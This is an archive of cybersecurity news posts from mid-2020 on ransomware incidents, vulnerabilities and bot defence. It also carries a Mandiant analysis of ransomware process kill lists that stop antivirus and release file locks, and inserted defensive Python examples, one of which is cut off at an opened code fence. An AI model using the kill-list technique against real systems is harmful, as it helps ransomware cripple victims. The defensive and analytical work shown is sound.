Category Archives: ransomware

Cyber Security Roundup for August 2020

A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, July 2020.

The standout hack of July 2020, and possibly of the year, was the takeover of 45 celebrity Twitter accounts, in a bid to scam their millions of followers by requesting Bitcoin in tweets. 
The high-profile Twitter accounts compromised included Barack Obama, Elon Musk, Kanye West, Bill Gates, Jeff Bezos, Warren Buffett, Kim Kardashian, and Joe Biden. Around £80,000 of Bitcoin was sent to the scammer's Bitcoin account before Twitter swiftly took action by deleting the scam tweets and blocking every 'blue tick' verified Twitter user from tweeting, including me.

While the Twitter hack and scam dominated media headlines around the world, the attack was not the 'highly sophisticated cyber-attack' reported by many media outlets, but it was certainly bold and clever. The attackers phoned Twitter administrative staff and blagged (socially engineered) their privileged Twitter account credentials out of them, which in turn gave the attackers access to Twitter's backend administrative system and to any Twitter account they desired. It is understood this Twitter account access was sold by a hacker on the dark web to a scammer in the days before the attack, and that the scammer(s) orchestrated near-simultaneous Bitcoin scam tweets from the high-profile accounts. On 31st July, law enforcement authorities charged three men for the attack, with one of the suspects disclosed as a 19-year-old British man from Bognor Regis.

There was a very serious critical Windows vulnerability disclosed as part of the July 2020 Microsoft 'Patch Tuesday' security update release. Dubbed "SIGRed", it is a 17-year-old Remote Code Execution (RCE) vulnerability in Windows Domain Name System (DNS), a component commonly present in Microsoft Windows Server 2008, 2012, 2012R2, 2016 and 2019. Disclosed as CVE-2020-1350, it was given the highest possible CVSS score of 10.0, which basically means the vulnerability is “easy to attack” and “likely to be exploited”, although Microsoft said they hadn't seen any evidence of its exploitation at the time of their patch release.

SIGRed is a wormable vulnerability, which makes it particularly dangerous: wormable malware could exploit it to spread rapidly across flat networks without any user interaction, as WannaCry did against the NHS and other large organisations. Secondly, it could be used to compromise privileged accounts (i.e. admin accounts found on servers). The Microsoft CVE-2020-1350 vulnerability can be mitigated on affected systems either by applying the Windows DNS Server patch released by Microsoft (https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350) or by applying the registry workaround (https://support.microsoft.com/en-us/help/4569509/windows-dns-server-remote-code-execution-vulnerability).

At least 10 universities in the UK had student data stolen after hackers attacked Blackbaud, an education-focused cloud service provider. UK universities impacted included York, Loughborough, Leeds, London, Reading, Exeter and Oxford. According to the BBC News website, Blackbaud said "In May of 2020, we discovered and stopped a ransomware attack. Prior to our locking the cyber-criminal out, the cyber-criminal removed a copy of a subset of data from our self-hosted environment."

As expected, the UK Government ordered UK mobile network operators to remove all Huawei 5G equipment by 2027, and banned the purchase of Huawei 5G network equipment after 31st December 2020. Digital Secretary Oliver Dowden said it follows sanctions imposed by the United States, which claims the Chinese firm poses a national security threat, which Huawei continues to resolutely deny. The ban is expected to delay the UK's 5G rollout by a year. "This has not been an easy decision, but it is the right one for the UK telecoms networks, for our national security and our economy, both now and indeed in the long run," he said.
In some media quarters, it was suggested the UK U-turn on Huawei could lead to cyberattack repercussions, after Reuters said its sources confirmed China was behind cyberattacks on Australia's critical national infrastructure and government institutions following Australia's trade dispute with China.

The Russian hacking group APT 29 was jointly accused of targeting coronavirus vaccine research for theft by the UK NCSC, the Canadian Communications Security Establishment (CSE), the United States Department of Homeland Security (DHS), the Cybersecurity and Infrastructure Security Agency (CISA) and the US National Security Agency (NSA). The UK's National Cyber Security Centre (NCSC) said the hackers "almost certainly" operated as "part of Russian intelligence services". It did not specify which research organisations had been targeted, or whether any coronavirus vaccine research data was taken, but it did say vaccine research was not hindered by the hackers. Russia's ambassador to the UK rejected the allegations: "I don't believe in this story at all, there is no sense in it," Andrei Kelin told the BBC's Andrew Marr Show. Foreign Secretary Dominic Raab, meanwhile, said it is "very clear Russia did this", adding that it is important to call out this "pariah-type behaviour".

UK sport said hackers tried to steal a £1 million club transfer fee and froze turnstiles at a football game. Cybercriminals hacked a Premier League club managing director's email account during a player transfer negotiation; the million-pound theft was only thwarted by a last-minute intervention by a bank. Another English football club was targeted by a ransomware attack that stopped its turnstiles and CCTV systems from working, which nearly resulted in a football match being postponed. Common tactics used by hackers to attack football clubs include compromising email accounts, cyber-enabled fraud and ransomware to shut down digital systems. For further information on this subject, see my extensive blog post on football club hacking, The Billion Pound Manchester City Hack.

Smartwatch maker Garmin had its website, mobile app and customer service call centres taken down by ransomware on 23rd July 2020. Reports suggest the fitness brand was hit by the WastedLocker ransomware strain, which is said to have been developed by individuals linked to a Russia-based hacking group called 'Evil Corp'. According to Bleeping Computer, Garmin paid $10 million to cybercriminals to receive decryption keys for the malware on 24th or 25th July 2020.

Yet another big data exposure caused by a misconfigured AWS S3 bucket was found by security researchers: one million files belonging to fitness brand 'V Shred' were discovered exposed to the world, including the personal data of 99,000 V Shred customers. Interestingly, V Shred defended itself against the researchers' findings by claiming it was necessary for user files to be publicly available, and denied that any PII had been exposed.


Cyber News Rundown: Twitter Hack Arrests


Multiple Individuals Charged for Twitter Hack

Three people were charged over last month’s Twitter hack, which generated over $100,000 in bitcoin by hijacking high-profile accounts. Of the 130 accounts used to spread the Bitcoin scam, major names included Elon Musk and Bill Gates, who have been impersonated in similar past scams. The FBI was apparently able to identify the perpetrators through a known hacking forum offering Twitter account hacking services for a fee.

Kentucky Unemployment Faces Second Breach in 2020

Kentucky’s unemployment system suffered its second data breach of the year last week. The breach came to light after a user reported being able to view another’s sensitive information while attempting to review their own. Officials are still uncertain how the breach occurred or the exact contents of the information available to the person who reported the incident.

Canon Suffers Ransomware Attack

Several services related to Canon, including its cloud storage systems, fell victim to a ransomware attack that knocked them offline for nearly a week. In addition to the offline systems, more than 10TB of customer data were allegedly stolen and a ransom note pertaining to the Maze Ransomware variant was identified. A large number of Canon’s website domains were also taken offline, with an internal server error being displayed to site visitors.

Havenly Interior Design Breach

A data trove containing roughly 1.4 million Havenly user accounts was posted for sale on a Dark Web marketplace last week. It included personally identifiable information of customers, including names, physical addresses and emails. The company’s official statement said no financial information was lost in the breach. While Havenly has recommended all customers update their login credentials, the breach occurred well over a month ago, enough time for affected customers to be subjected to identity theft or attacks aimed at compromising further accounts.

Massive VPN Server Password Leak

The credentials for over 900 enterprise-level Pulse Secure VPN servers recently appeared on a hacker forum known to be frequented by ransomware groups. The plain-text dump contains enough information to take full control of the servers, which are currently running firmware with known critical vulnerabilities identified within the past two months. The vulnerability that allowed this breach, CVE-2019-11510, was identified and patched late last year; many of the attack’s victims had neglected to apply the patch.

The post Cyber News Rundown: Twitter Hack Arrests appeared first on Webroot Blog.

Belarus Announces Arrest of GandCrab Ransomware Distributor

Government officials in Belarus announced they had arrested an individual on charges of having helped to distribute GandCrab ransomware. On July 30, the Ministry of Internal Affairs (MIA) of the Republic of Belarus revealed that it had arrested a 31-year-old resident of Gomel in cooperation with the United Kingdom and Romania. An investigation into the […]

The post Belarus Announces Arrest of GandCrab Ransomware Distributor appeared first on The State of Security.

Cyber News Rundown: WasteLocker Ransomware


Garmin Hit with WastedLocker Ransomware

Nearly a week after the company announced they had suffered a system outage, Garmin has finally admitted to falling victim to a ransomware attack, likely from the increasingly popular WastedLocker variant. As is the norm for WastedLocker, the attack was very specific in its targeting of the company (even mentioning Garmin by name in the ransom note) and took many of their services offline. Though Garmin has confirmed that no customer data was affected, they are still unsure when their services will return to full functionality.

Israeli Marketing Firm Suffers Data Breach

More than 14 million user accounts held by the Israeli marketing firm Promo were compromised in a recent breach. Subsequently, at least 1.4 million decrypted user passwords were found for sale on a Dark Web forum, along with 22 million records containing highly sensitive information. The company has since contacted affected customers and is pushing a forced password reset.

Netwalker Ransomware Targets U.S. Government Organizations

The FBI has released a security statement concerning Netwalker ransomware attacks, which have targeted both U.S. and foreign government agencies in recent months. Netwalker is known for exploiting remote desktop utilities to compromise major enterprise networks. It also offers ransomware-as-a-service to other cybercriminals. The best methods for blocking these types of attacks are setting up two-factor authentication (2FA) and creating offline data backups to protect data in case of a successful breach.

Lazarus Hacking Group Branches Out to Ransomware

The North Korean state-sponsored hacking group Lazarus has added ransomware to their latest attacks. Unfortunately for the group, the ransomware variant they’ve chosen is inefficient at encrypting data, sometimes taking up to 10 hours to fully encrypt a single system. These attacks are similar to those targeting Sony Pictures in 2014 and those that affected the 2018 Winter Olympic games, both of which are suspected to have been conducted by state-backed actors.

Nefilim Ransomware Begins Publishing Dussmann Group’s Data

At least 14GB of data belonging to a subsidiary of Dussmann Group, a major German MSP, is being leaked by the operators of the Nefilim ransomware variant. The operators have confirmed they were able to obtain roughly 200GB of data from the subsidiary after discovering a still-unknown method for compromising the network. Customers affected by the leak have already been notified.

The post Cyber News Rundown: WasteLocker Ransomware appeared first on Webroot Blog.

Smashing Security podcast #189: DNA cock-up, Garmin hack, and virtual kidnappings

Why are students faking their own kidnappings? What’s the story behind Garmin’s ransomware attack? And a genetic genealogy website suffers a hack or two.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Ray REDACTED.

FBI Releases Flash Alert on Netwalker Ransomware

The Federal Bureau of Investigations (FBI) released a flash alert in which it warned organizations about the dangers of Netwalker ransomware. On July 28, the FBI revealed in Flash Alert MI-000130-MW that it had received notifications of attacks involving Netwalker against U.S. and foreign government organizations along with entities operating in the healthcare and education […]

The post FBI Releases Flash Alert on Netwalker Ransomware appeared first on The State of Security.

Dussman Group Subsidiary Struck by Ransomware that Leaked Its Data

A subsidiary of the Dussman Group suffered a ransomware infection in which malicious actors stole and publicly leaked its data. As reported by Bleeping Computer, the operators of Nefilim ransomware made good on a promise made back in March to begin publishing victims’ stolen information by updating their data leaks website with a post entitled […]

The post Dussman Group Subsidiary Struck by Ransomware that Leaked Its Data appeared first on The State of Security.

How Cloud Mitigation Techniques Can Help Prevent Ransomware and Phishing Attacks

The COVID-19 pandemic revealed flaws in the American healthcare system that were always there. The only difference now is that those flaws have been brought to light. In the wake of the pandemic, a new host of cyberattacks occurred within the healthcare sector. Malicious hackers aimed to take advantage of the crisis with a combination […]

The post How Cloud Mitigation Techniques Can Help Prevent Ransomware and Phishing Attacks appeared first on The State of Security.

Ransomware is Still a Blight on Business


Trends come and go with alarming regularity in cybersecurity. Yet a persistent menace over the past few years has been ransomware. Now mainly targeting organizations rather than consumers, and with increasingly sophisticated tools and tactics at their disposal, the cybercriminals behind these campaigns have been turning up the heat during the COVID-19 pandemic. That’s why we need industry partnerships like No More Ransom.

Celebrating its fourth anniversary this week, the initiative has helped over four million victims fight the scourge of ransomware, saving hundreds of millions of dollars in the process. At Trend Micro, we’re proud to have played a major part, helping to decrypt over 77 million files for victims.

Not going anywhere

Ransomware has been with us for years, but only really hit the mainstream after the global WannaCry and NotPetya incidents of 2017. Unfortunately, that was just the start. Today, no sector is safe. We saw attacks rage across US municipalities, school districts and hospitals in 2019. Most recently, a major outage at a connected technology giant impacted everything from consumer fitness trackers to on-board flight systems.

Such attacks can hit victim organizations hard. There are serious reputational and financial repercussions from major service outages, and the stakes have been raised even further as attackers now often steal data before encrypting victims’ files. A recent incident at a US cloud computing provider has led to data compromise at over 20 universities and charities in the UK and North America, for example. A separate ransomware attack on a managed service provider earlier this year may cost it up to $70m.

The bad guys have shown no sign of slowing down during the pandemic — quite the reverse. Even as hospitals have been battling to save the lives of patients battling COVID-19, they’ve been targeted by ransomware designed to lock mission-critical systems.

No More Ransom

That’s why we need to celebrate public-private partnerships like No More Ransom, which provides helpful advice for victims and a free decryption tool repository. Over the past four years it has helped 4.2 million visitors from 188 countries, preventing an estimated $632 million in ransom demands finding its way into the pockets of cyber-criminals.

At Trend Micro, we’re proud to have been an associate partner from the very start, contributing our own decryption tools to the scores available today to unlock 140 separate ransomware types. Since the start of No More Ransom, Trend Micro tools have been downloaded nearly half a million times, helping over 50,000 victims globally to decrypt more than 77 million files. We simply can’t put a price on this kind of intervention.

https://www.europol.europa.eu/publications-documents/infographic-4th-anniversary-no-more-ransom 

Yet while the initiative is a vital response to the continued threat posed by ransomware, it is not all we can do. To truly beat this menace, we need to educate organizations all over the planet to improve their resilience to such malware threats. That means taking simple steps such as:

  • Backing up regularly, according to best practice 3-2-1 policy
  • Installing effective AV from a trusted vendor, featuring behavior monitoring, app whitelisting and web reputation
  • Training staff how to better spot phishing attacks
  • Ensuring software and systems are always on the latest version
  • Protecting the enterprise across endpoint, hybrid cloud, network and email/web gateways

I’m also speaking on a panel today hosted by the U.S. Chamber of Commerce on NotPetya and general ransomware attack trends related to the pandemic. Join us to learn more about ransomware from law enforcement agencies, policy makers and businesses.

If your organization has been impacted by ransomware, check the resources available on https://www.nomoreransom.org/ for advice and access to the free decryption tool repository.


Cyber News Rundown: ATM Jackpotting Attacks Rise


ATM Jackpotting Attacks on the Rise

ATM manufacturer Diebold Nixdorf has identified a malicious campaign that uses proprietary software to “jackpot” the machines. The attack requires malicious actors to breach the ATM manually and then use the software to force the machine to dispense cash at a rapid rate, known within the industry as jackpotting. While these attacks don’t seem to affect customer data or finances, the company is unsure how the attackers obtained the proprietary software used in the scam.

Ransomware Locks Down Telecom Argentina

Telecom Argentina is being extorted for over $7.5 million following a ransomware attack last week. The hacker group REvil is believed to be behind the attack, which may mean the stolen data is set to be posted on the group’s auction site. Officials are still unsure of how the intrusion occurred, but it’s likely to have stemmed from a compromised remote access point.

Maryland Health Services Breach Affects Thousands

More than 40,000 individuals may have had personal information leaked after a ransomware attack on Lorien Health Services in Maryland. The breach was discovered in June, but after the healthcare provider refused to pay the ransom the hackers began publishing the stolen data, which includes Social Security Numbers and other highly sensitive information. Lorien was quick to notify affected clients and had begun offering credit monitoring services to those affected within two days of the attack being confirmed.

University of York Data Breach

The University of York in the UK has learned of a data breach that occurred in May and could affect a considerable number of students and staff. The breach itself was enabled by a third-party service provider and contained personally identifiable information on an unknown number of victims. While there is little the university can do to contain this type of attack, it comes as another reminder of the importance of supply chain data security and the knock-on effect of such attacks.

Meow Attacks Target Vulnerable Databases

Dozens of unsecured Elasticsearch and MongoDB databases were wiped in a new malicious campaign that seems to attack indiscriminately. Discovered within the last week, the Meow attacks, as they’re known, appear to use an automated script to overwrite and destroy the data in vulnerable databases. This string of attacks may encourage stronger security policies among previously lax database administrators, but the lesson is costly for affected businesses.

The post Cyber News Rundown: ATM Jackpotting Attacks Rise appeared first on Webroot Blog.

How to Prevent Hackers from Using Bad Bots To Exploit Your Website?

What Are Bad Bots?

A bot (also called an internet bot, web bot or www bot, among other similar terms) is a program designed to perform relatively simple tasks in an automated, repetitive way. A bot is typically built to replace humans in performing an otherwise time-consuming or boring task.

For example, web scraping, the act of copying and saving data and files from a website, can obviously be done by a human operator, but a web scraper bot achieves the same result much faster.

However, although bots can perform beneficial tasks, there are also bad bots designed to perform malicious tasks like illegally scraping unauthorized content, stealing data, and even launching full-scale DDoS attacks.

Bad bots typically come as malware, and there are now billions of bad bots available on the internet. According to the latest data, bot activities drove almost 40% of the total internet traffic in 2018, and a lot of them are bad bots. 

Bad bot activities, at best, might slow down your website speed or launch relatively harmless spam attacks in your comment section. However, bad bots can also cause more severe cybersecurity threats like a full-scale DDoS attack or data breach.

Identifying and Monitoring Bad Bot Activities

The first and most important thing you can do about bad bot activities is to keep an eye on your website’s traffic and check whether there are any bot activities on your site. By properly identifying bot activities, we can devise a better plan to block their activities. 

Here are some basic but important ways you can identify the existence of bots on your site: 

 

  • Sign Up Authentication

If your website involves user accounts, sign-up authentication via phone/SMS verification or email verification can prevent bots from registering accounts on your site, while still allowing legitimate users to create an account easily and access your site.

  • Hide your site’s email address

Sophisticated spambots can exploit a tag that lets them spam your site’s inbox; typically this is a tag in your site’s contact form (or any other submission form on your website).

First, write your email address as “x[at]y[dot]z” instead of the usual x@y.z format, so that a spam bot scanning your site for addresses does not harvest it. Also, choose a contact form that hides the email address the submission goes to. If you are using a form builder, make sure the target email address is hidden in an external script.

Implementing CAPTCHA

CAPTCHA is your site’s first layer of actual defense against bot activities, but it’s very important to note that CAPTCHAs alone are not enough to defend against today’s more sophisticated bots that can accurately mimic human behaviors. 

Nowadays, cybercriminals can also employ CAPTCHA farm services—a company/person who solves CAPTCHAs by distributing them to a pool of human workers—in combination with bot attacks. This practice will render CAPTCHAs practically useless. 

So, think of CAPTCHAs as a prerequisite defense measure rather than a one-size-fits-all answer. 

CAPTCHA stands for “Completely Automated Public Turing test to tell Computers and Humans Apart”, and is a simple test to differentiate between humans and bots. Implementing CAPTCHAs is now easier than ever, and Google’s reCAPTCHA (which is free and pretty reliable) can be used for a site’s CAPTCHA needs.

Also, although CAPTCHAs are designed to be easily solved by human users, they will still slow down your actual users and might hurt their experience. So, use them sparingly. A good practice is to only show a CAPTCHA when the user has performed suspicious activities, like failing to log in a specific number of times.

Another simple but effective practice is to require a CAPTCHA from (or completely block) outdated browsers or user agent strings. In general, you should block browsers that are more than 3 years old and require a CAPTCHA from those that are 2 years old or older.

Other Protective Measures

Here are other cybersecurity measures that can be effective in preventing bad bots on your website:

  • Using robots.txt. Configuring the robots.txt file at the root of your website can be effective in blocking bots. The robots.txt file tells bots which pages they are allowed to crawl. However, robots.txt is honoured only by bots that choose to respect it, so it might not be enough to block sophisticated and aggressive bots, but it is a decent safety measure for basic bots and overly aggressive crawlers.
  • Multi-factor authentication. Multi-factor authentication (or, more commonly, two-factor authentication) requires users to provide additional information besides their passwords, for example a fingerprint/iris scan or a verification PIN. This helps in cases where a bot has cracked the actual credentials.
  • WAF. Web application firewalls (WAFs) can now employ advanced methods to stop bot traffic even before any interaction with the site.
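As an added example (not part of the original post and not any vendor's tool), the following Python script shows one way to do the traffic monitoring described under "Identifying and Monitoring Bad Bot Activities" and to turn the robots.txt rule above into a detection signal. It parses combined-format access log lines, measures each client's burst rate, counts requests to paths that robots.txt disallows, and looks for user-agent strings of common automation clients. The log lines, the robots.txt, the thresholds and the marker list are all constructed for the example.

```python
"""Triage bot-like clients from web server access logs (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache/nginx "combined" log format: ip ident user [time] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# User-agent fragments of common automation clients. A scraper can forge its
# user agent, so this is one signal among several, never proof on its own.
AUTOMATION_UA_MARKERS = ("HeadlessChrome", "PhantomJS", "python-requests", "curl/", "Scrapy")

# Constructed robots.txt for the example: two paths off limits to all crawlers.
SAMPLE_ROBOTS = "User-agent: *\nDisallow: /private/\nDisallow: /admin/\n\nUser-agent: Googlebot\nDisallow:\n"

BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/84.0.4147.89 Safari/537.36"


def _line(ip, second, path, ua, status=200):
    """Build one constructed log line (all traffic below is made up for the example)."""
    return f'{ip} - - [10/Aug/2020:10:00:{second:02d} +0000] "GET {path} HTTP/1.1" {status} 512 "-" "{ua}"'


# Constructed traffic: a normal browser, a scraper that reads robots.txt and then
# hammers the disallowed /private/ tree, and a single curl request.
SAMPLE_LOG = "\n".join(
    [_line("203.0.113.5", 1, "/", BROWSER_UA),
     _line("203.0.113.5", 9, "/products", BROWSER_UA),
     _line("203.0.113.5", 31, "/products/42", BROWSER_UA),
     _line("198.51.100.7", 0, "/robots.txt", "python-requests/2.24.0")]
    + [_line("198.51.100.7", 1 + i // 2, f"/private/item-{i}", "python-requests/2.24.0") for i in range(40)]
    + [_line("192.0.2.9", 15, "/", "curl/7.68.0")]
)


def parse_line(line):
    """Return a dict for one combined-format log line, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def disallowed_prefixes(robots_txt):
    """Collect Disallow path prefixes from the 'User-agent: *' group of a robots.txt.

    Simplification: a group is assumed to start with a single User-agent line.
    """
    prefixes, in_wildcard = [], False
    for raw in robots_txt.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        key, _, value = line.partition(":")
        key, value = key.strip().lower(), value.strip()
        if key == "user-agent":
            in_wildcard = value == "*"
        elif key == "disallow" and in_wildcard and value:
            prefixes.append(value)
    return prefixes


def max_requests_in_window(timestamps, window):
    """Largest number of requests from one client inside any sliding time window."""
    ts = sorted(timestamps)
    best, start = 0, 0
    for end in range(len(ts)):
        while ts[end] - ts[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def triage(log_text, robots_txt, window=timedelta(seconds=60), rate_threshold=30):
    """Score each client IP on burst rate, robots.txt violations and automation user agents."""
    blocked = disallowed_prefixes(robots_txt)
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)
    report = {}
    for ip, recs in by_ip.items():
        burst = max_requests_in_window([r["ts"] for r in recs], window)
        violations = sum(1 for r in recs if any(r["path"].startswith(p) for p in blocked))
        ua_hits = sorted({mk for r in recs for mk in AUTOMATION_UA_MARKERS if mk in r["ua"]})
        score = int(burst >= rate_threshold) + int(violations > 0) + int(len(ua_hits) > 0)
        report[ip] = {"requests": len(recs), "burst": burst, "disallowed_hits": violations,
                      "automation_ua": ua_hits, "score": score}
    return report


if __name__ == "__main__":
    for ip, finding in sorted(triage(SAMPLE_LOG, SAMPLE_ROBOTS).items(), key=lambda kv: -kv[1]["score"]):
        print(ip, finding)
```

A score of 3 (all three signals) is a strong candidate for blocking or challenging; a lone automation user agent, as with the curl request, is only worth logging, since legitimate monitoring and integrations use such clients too.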

 

Advanced Bot Detection Measures

As bad bots become much more sophisticated and better at mimicking human behavior, advanced detection is necessary, mainly via AI-driven technologies that can perform the following detection techniques:

 

  • Behavioral detection

As the name suggests, this detection focuses on analyzing traffic behavior to differentiate between human behavior and bot behavior. This includes examining aspects like linear/non-linear mouse movements, typing habits, form submission speed, and so on.

Today’s fourth-generation bots are very good at mimicking human behavior, but advanced behavioral detection technology can still tell the difference.

  • Fingerprinting

In fingerprinting-based detection, we aim to obtain as much information on the incoming traffic as possible, from basic information like the IP address (although not very effective nowadays) to the devices used, browsers used, and so on.

The common approach here is to check for browser attributes added by headless browsers and automation frameworks such as Nightmare, PhantomJS, Puppeteer and Selenium.

Another approach is to check for consistency across repeated logins, for example whether the browser and operating system match those seen on the account’s previous logins.
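An added example (not the original author's code) that puts the CAPTCHA gating advice from the "Implementing CAPTCHA" section and the fingerprint-consistency check above into one server-side decision routine. The version cutoffs in MIN_CURRENT_MAJOR and MIN_ACCEPTED_MAJOR are hypothetical placeholders standing in for the "2 years old" and "3 years old" rules, the headless markers are default user-agent fragments that tooling can override, and the account names and user agents used to exercise it are constructed.

```python
"""Risk-based login gating: CAPTCHA on suspicion, block on clear automation signals."""
import re

# Hypothetical cutoffs standing in for the "2 years old" (challenge) and
# "3 years old" (block) rules; an operator would maintain these from release data.
MIN_CURRENT_MAJOR = {"Chrome": 80, "Firefox": 75}
MIN_ACCEPTED_MAJOR = {"Chrome": 70, "Firefox": 65}
# Default user-agent fragments of headless tooling. They can be overridden, so they
# are a cheap first signal rather than proof.
HEADLESS_MARKERS = ("HeadlessChrome", "PhantomJS")
FAILED_LOGIN_LIMIT = 3

UA_BROWSER_RE = re.compile(r"(Chrome|Firefox)/(\d+)")
UA_OS_RE = re.compile(r"\((Windows NT|Macintosh|X11; Linux|Android|iPhone)")


def parse_ua(ua):
    """Return (browser, major version, OS family); None for fields that cannot be read."""
    b = UA_BROWSER_RE.search(ua)
    o = UA_OS_RE.search(ua)
    return (b.group(1) if b else None, int(b.group(2)) if b else None, o.group(1) if o else None)


class LoginGate:
    """Tracks per-account login history and decides allow / captcha / block."""

    def __init__(self):
        self.last_fingerprint = {}  # account -> (browser, os) from the last successful login
        self.failures = {}          # account -> consecutive failed login attempts

    def record_failure(self, account):
        self.failures[account] = self.failures.get(account, 0) + 1

    def record_success(self, account, ua):
        browser, _, os_family = parse_ua(ua)
        self.last_fingerprint[account] = (browser, os_family)
        self.failures[account] = 0

    def decide(self, account, ua):
        """Return (decision, reasons); decision is 'allow', 'captcha' or 'block'."""
        if any(marker in ua for marker in HEADLESS_MARKERS):
            return "block", ["headless marker in user agent"]
        browser, major, os_family = parse_ua(ua)
        if browser in MIN_ACCEPTED_MAJOR and major < MIN_ACCEPTED_MAJOR[browser]:
            return "block", [f"{browser} {major} is older than the accepted cutoff"]

        reasons = []
        if browser is None:
            reasons.append("unrecognised browser")
        elif browser in MIN_CURRENT_MAJOR and major < MIN_CURRENT_MAJOR[browser]:
            reasons.append(f"{browser} {major} is older than the current cutoff")
        if self.failures.get(account, 0) >= FAILED_LOGIN_LIMIT:
            reasons.append("repeated failed logins")
        previous = self.last_fingerprint.get(account)
        if previous and previous != (browser, os_family):
            reasons.append("browser/OS differs from the last successful login")
        return ("captcha" if reasons else "allow"), reasons


if __name__ == "__main__":
    # Constructed walk-through: a Windows user, then the same account from a Mac.
    gate = LoginGate()
    win = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36"
    mac = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36"
    print(gate.decide("alice", win))
    gate.record_success("alice", win)
    print(gate.decide("alice", mac))
```

The ordering matters: hard signals (headless markers, a browser past the block cutoff) short-circuit to a block, while softer signals only raise a CAPTCHA, which keeps the friction for ordinary users to the suspicious cases the post recommends.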

End Words

Ideally, preventing the activities of bad bots should be as automated as possible, to ensure the earliest possible detection while avoiding false positives (mistakenly blocking legitimate human users as bots).

With so much bad bot activity, and with bots having evolved to be far more sophisticated than ever, advanced bot detection and protection software such as DataDome’s is no longer a luxury but a necessity to prevent cybersecurity threats ranging from data scraping to DDoS to full-blown data breaches.

The post How to Prevent Hackers from Using Bad Bots To Exploit Your Website? appeared first on Hacker Combat.

Financially Motivated Actors Are Expanding Access Into OT: Analysis of Kill Lists That Include OT Processes Used With Seven Malware Families

Mandiant Threat Intelligence has researched and written extensively on the increasing financially motivated threat activity directly impacting operational technology (OT) networks. Some of this research is available in our previous blog posts on industrial post-compromise ransomware and FireEye's approach to OT security. While most of the actors behind this activity likely do not differentiate between IT and OT or have a particular interest in OT assets, they are driven by the goal of making money and have demonstrated the skills needed to operate in these networks. For example, the shift to post-compromise ransomware deployment highlights the actors’ ability to adapt to more complex environments.

In this blog post we look further into this trend by examining two different process kill lists containing OT processes which we have observed deployed alongside a variety of ransomware samples and families. We think it is likely that these lists were the result of coincidental asset scanning in victim organizations and not specific targeting of OT. While this judgement may initially seem like good news to defenders, this activity still indicates that multiple, very prolific, financially motivated threat actors are active inside organizations’ OT—based on the contents of these process kill lists—with the intent of profiting from the ransom of stolen information and disrupted services.

Two Unique Process Kill Lists Deployed Alongside Seven Ransomware Families Include OT Processes

Threat actors often deploy process kill lists alongside or as part of ransomware to terminate anti-virus products, stop alternative detection mechanisms, and release file locks so that critical data can be encrypted. As a result, the deployment of these lists increases the likelihood of a successful attack (MITRE ATT&CK T1489). In post-compromise ransomware attacks, attackers regularly tailor the lists to include processes that are relevant to the victim’s environment. By stopping these processes, the attacker makes sure to encrypt data from critical systems, which might otherwise remain unencrypted because a running process holds the files open. As the likelihood of crippling critical systems increases, the target is more likely to suffer impacts on its physical production.

First Process Kill List Has Been Leveraged By At Least Six Ransomware Families

Mandiant identified samples of at least six ransomware families (DoppelPaymer, LockerGoga, Maze, MegaCortex, Nefilim and SNAKEHOSE)—all of which have been associated with high-profile incidents impacting industrial organizations over the past two years—that have leveraged a common process kill list containing 1,000+ processes. The list, which we briefly discussed in an earlier blog post from February 2020, includes a couple dozen processes related to OT executables—mainly from General Electric Proficy, a suite used for historians and human-machine interfaces (HMIs). We note, that while the inclusion of these processes in this kill list could result in limited loss of view of historical process data, it is not likely to directly impact the operator’s ability to control the physical process itself.


Figure 1: Snippets from “kill.bat” deployed alongside LockerGoga (L) and MegaCortex process kill list (R)

The earliest iteration we identified of the shared kill list was a batch script deployed alongside LockerGoga (MD5: 34187a34d0a3c5d63016c26346371b54) in January 2019 (Figure 1). Other iterations of the list we have observed are hardcoded directly into the ransomware binaries. The different techniques used to deploy the process kill list, the use of different malware families, and slight variations between each list iteration (mainly typos in the process names, e.g. a2guard.exea2start.exe; nexe; proficyclient.exe) indicate that more than one actor likely had access to the true source of the process kill list. This source could be, for example, a list of processes posted on a dark web forum, or an independent actor sharing the compiled list with other actors.

We think it is likely that the OT processes identified in this list simply represent the coincidental output of automated process collection from victim environment(s) and not a targeted effort to impact OT. This is supported by the relatively limited and specific selection of OT-related processes, rather than a broader selection of many vendors and OT-related processes that would have been suggestive of targeted external research. Regardless, this does not downplay the significance of the inclusion of OT processes in the list, as it suggests that sophisticated financially motivated actors, such as FIN6, have had at least some visibility into a victim’s OT network. As a result, the actors were able to tailor their malware to impact those systems, without the explicit intent to target OT assets.

Most types of ransomware attacks in OT environments will result in the disruption of services and a temporary loss of view into current and historical process data. However, OT environments impacted by ransomware that leverages this kill list, and that happen to be running one or more of the processes used by the initial victim(s) and therefore included on the list, may face additional impacts. For example, historian databases would be more likely to be encrypted, possibly resulting in loss of historical data. Other impacts could include gaps in the collection of process data corresponding to the duration of the outage and temporary loss of access to licensing rights for critical services.
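As an added example (not Mandiant's code, and not the kill list itself), the following Python script triages a kill list in either of the two forms described above: a kill.bat of taskkill / net stop commands, or process names recovered from a binary with a strings dump. It extracts the targets, splits entries where two names have been run together (the a2guard.exea2start.exe pattern), flags entries with no extension, and matches the rest against a small process-to-vendor map. Both inputs and the vendor map are constructed for illustration; a real triage would load the full appendix-style list.

```python
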